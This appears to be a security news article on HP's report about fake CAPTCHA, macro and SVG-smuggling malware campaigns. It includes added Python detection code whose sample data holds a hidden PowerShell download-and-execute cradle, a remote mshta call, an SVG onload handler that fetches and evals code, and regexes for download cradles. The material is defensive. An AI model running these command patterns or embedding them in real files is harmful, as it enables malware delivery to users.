HP Threat Insights Report Reveals Surge in Fake CAPTCHA Cyberattacks

News Desk -


At its annual Amplify Conference, HP Inc. (NYSE: HPQ) released the latest HP Threat Insights Report, exposing a sharp increase in cyberattacks using fake CAPTCHA verification tests to trick users into compromising their devices. This growing tactic takes advantage of “click tolerance,” a trend where users, accustomed to multi-step authentication, are more likely to follow deceptive prompts.

The report, based on data from millions of endpoints running HP Wolf Security, documents several notable attack campaigns. One significant finding is the rise of fake CAPTCHA challenges that lure victims into running malicious PowerShell commands on their own machines, leading to the installation of Lumma Stealer, an information-stealing malware (the report describes it as a remote access trojan). Another campaign delivers XenoRAT, an open-source remote access trojan with surveillance capabilities that gives attackers access to a victim's webcam and microphone. Using social engineering, the attackers convince users to enable macros in Word and Excel documents; the macro then installs the RAT, which lets them exfiltrate data, log keystrokes, and spy on users.
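The fake CAPTCHA campaigns above end with the user launching an interpreter by hand, so the most reliable detection point is process creation rather than the lure page. The following is an added example, not code from the HP report or HP Wolf Security: a small scorer over process-creation events in the shape of Sysmon Event ID 1 records. The sample events and the heuristics (an interpreter spawned by explorer.exe, a hidden-window flag, a download cradle or remote URL, an encoded command, or CAPTCHA lure text carried into the command line) are assumptions drawn from how such campaigns are commonly reported, not indicators taken from the report.

```python
import re

# Constructed sample process-creation events in the shape of Sysmon Event ID 1 records.
# They are illustrative, not telemetry from HP Wolf Security or any real incident.
SAMPLE_EVENTS = [
    {   # benign: an administrator runs a script from an interactive console
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\ops\rotate-logs.ps1",
    },
    {   # suspicious: PowerShell spawned by explorer.exe (Run dialog) with a hidden window,
        # a download cradle, and the CAPTCHA lure text pasted along with the command
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -w hidden -c "iwr https://cdn.example.invalid/verify.txt | iex" '
                       '# I am not a robot - reCAPTCHA Verification ID: 7421',
    },
    {   # suspicious: mshta launched from explorer.exe with a remote URL
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": "mshta https://verify.example.invalid/captcha.hta",
    },
    {   # benign: explorer.exe launches an ordinary application
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Program Files\Notepad++\notepad++.exe",
        "CommandLine": '"C:\\Program Files\\Notepad++\\notepad++.exe" notes.txt',
    },
]

# Interpreters that a pasted one-liner typically invokes (assumed list, extend per environment).
INTERPRETERS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe")

DOWNLOAD_CRADLE = re.compile(
    r"(invoke-webrequest|\biwr\b|\bcurl\b|downloadstring|net\.webclient|\biex\b|invoke-expression|https?://)",
    re.I)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile", re.I)
ENCODED = re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)
LURE_TEXT = re.compile(r"not a robot|captcha|verification", re.I)


def _basename(path):
    """Lower-cased file name of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def score_event(event):
    """Return (score, reasons) for one process-creation event; non-interpreters score 0."""
    parent = _basename(event["ParentImage"])
    image = _basename(event["Image"])
    cmd = event["CommandLine"]
    reasons = []
    if image not in INTERPRETERS:
        return 0, reasons
    if parent == "explorer.exe":
        reasons.append("interpreter spawned by explorer.exe (Run dialog / user-driven launch)")
    if DOWNLOAD_CRADLE.search(cmd):
        reasons.append("download cradle or remote URL in command line")
    if HIDDEN_WINDOW.search(cmd):
        reasons.append("hidden window / no-profile flags")
    if ENCODED.search(cmd):
        reasons.append("encoded command")
    if LURE_TEXT.search(cmd):
        reasons.append("CAPTCHA lure text carried into the command line")
    return len(reasons), reasons


def flag_events(events, threshold=2):
    """Return [(event, reasons)] for events whose score reaches the threshold."""
    flagged = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            flagged.append((event, reasons))
    return flagged


if __name__ == "__main__":
    for event, reasons in flag_events(SAMPLE_EVENTS):
        print(_basename(event["Image"]), "<-", _basename(event["ParentImage"]))
        for reason in reasons:
            print("   ", reason)
```

A threshold of two keeps a lone explorer.exe-spawned PowerShell (which users do launch legitimately) from firing on its own, while the combination with a hidden window or a download cradle is rarely benign. The lure-text check works because victims often paste the whole clipboard contents, including the "I am not a robot" decoy, into the Run dialog.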

The report also highlights a sophisticated attack using SVG smuggling: embedding JavaScript inside Scalable Vector Graphics (SVG) images, which scanners tend to treat as harmless pictures. When such an image is opened in a browser, the embedded script runs and deploys seven different payloads, including RATs and infostealers. Obfuscated Python scripts are also used to install malware, taking advantage of the interpreter's growing presence on endpoints as Python adoption spreads through AI and data science work.
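SVG is XML, so the active content an SVG smuggling attack relies on is visible in the document tree: `<script>` elements, `on*` event-handler attributes, `javascript:` or `data:` hrefs, and `<foreignObject>` (which can wrap arbitrary HTML). The following added example, which is not code from the HP report, walks that tree with the standard library and reports any active content it finds. The four sample SVG documents are constructed for the example; the decoded stage they reference is a stand-in and not a real payload.

```python
import xml.etree.ElementTree as ET

# Constructed sample SVG documents (not samples from the HP report).
BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100">
  <circle cx="50" cy="50" r="40" fill="steelblue"/>
</svg>"""

SCRIPT_SVG = """<svg xmlns="http://www.w3.org/2000/svg">
  <rect width="10" height="10"/>
  <script type="text/javascript"><![CDATA[
    var p = atob("ZG9jdW1lbnQud3JpdGUoJ3N0YWdlIDInKQ==");  // stand-in for a decoded dropper stage
    eval(p);
  ]]></script>
</svg>"""

HANDLER_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
  onload="fetch('https://cdn.example.invalid/s2').then(r=>r.text()).then(eval)">
  <circle r="1"/>
</svg>"""

LINK_SVG = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <a xlink:href="javascript:location='https://login.example.invalid'"><text>Open document</text></a>
</svg>"""

ACTIVE_SCHEMES = ("javascript:", "data:")


def _local(qualified):
    """Strip an ElementTree '{namespace}name' prefix, leaving the local name."""
    return qualified.rsplit("}", 1)[-1]


def scan_svg(svg_text):
    """Return a list of (finding, snippet) pairs describing active content in an SVG document.

    Note: ElementTree expands internal XML entities; for untrusted input in production,
    parse with defusedxml or cap the input size before calling this (assumption, not from the report).
    """
    findings = []
    root = ET.fromstring(svg_text)
    for el in root.iter():
        name = _local(el.tag)
        if name == "script":
            findings.append(("script element", (el.text or "").strip()[:40]))
        if name == "foreignObject":
            findings.append(("foreignObject (can embed HTML)", ""))
        for attr, value in el.attrib.items():
            aname = _local(attr)
            if aname.lower().startswith("on"):
                findings.append((f"event handler {aname} on <{name}>", value[:40]))
            if aname == "href" and value.strip().lower().startswith(ACTIVE_SCHEMES):
                findings.append((f"active href on <{name}>", value[:40]))
    return findings


def is_active(svg_text):
    """True if the SVG carries any script, handler, active link or foreignObject."""
    return bool(scan_svg(svg_text))


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_SVG), ("script", SCRIPT_SVG),
                       ("handler", HANDLER_SVG), ("link", LINK_SVG)):
        print(label, is_active(doc), scan_svg(doc))
```

A gateway that only checks the file extension or MIME type of an attachment sees all four as images; the tree walk distinguishes them. The same checks apply to SVGs delivered inline in HTML mail or fetched from a link, where an `<img>` tag would not execute the script but a direct navigation to the file would.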

According to Patrick Schläpfer, Principal Threat Researcher at HP Security Lab, these campaigns emphasize how cybercriminals use obfuscation and anti-analysis techniques to evade detection and delay security responses. He notes that simple but effective evasion tactics make it difficult for security tools to identify malicious activity, giving attackers more time to compromise endpoints.

The HP Threat Insights Report analyzes data from Q4 2024 and highlights how cybercriminals are bypassing detection-based security solutions. At least 11% of email threats identified by HP Sure Click evaded one or more email gateway scanners. Executables (43%) were the most common malware delivery method, followed by archive files (32%), showing that attackers continue to use diverse strategies to breach systems.

Dr. Ian Pratt, Global Head of Security for Personal Systems at HP Inc., warns that the rise of multi-step authentication increases click tolerance, making users more vulnerable to multi-stage attacks. He emphasizes that organizations must prioritize shrinking the attack surface by isolating risky user actions rather than relying solely on predictive security measures.

HP Wolf Security isolates threats that evade traditional detection tools, allowing malware to detonate safely in secure containers. This proactive approach gives HP unique insights into emerging cyberattack techniques. To date, HP Wolf Security has protected users who have interacted with over 65 billion email attachments, web pages, and downloaded files—without a single reported breach.

As cyber threats evolve, the report stresses the need for advanced endpoint protection and attack isolation to defend against increasingly sophisticated methods. With the growing use of AI and other emerging technologies, traditional detection-based security tools are no longer enough to combat modern cyber threats.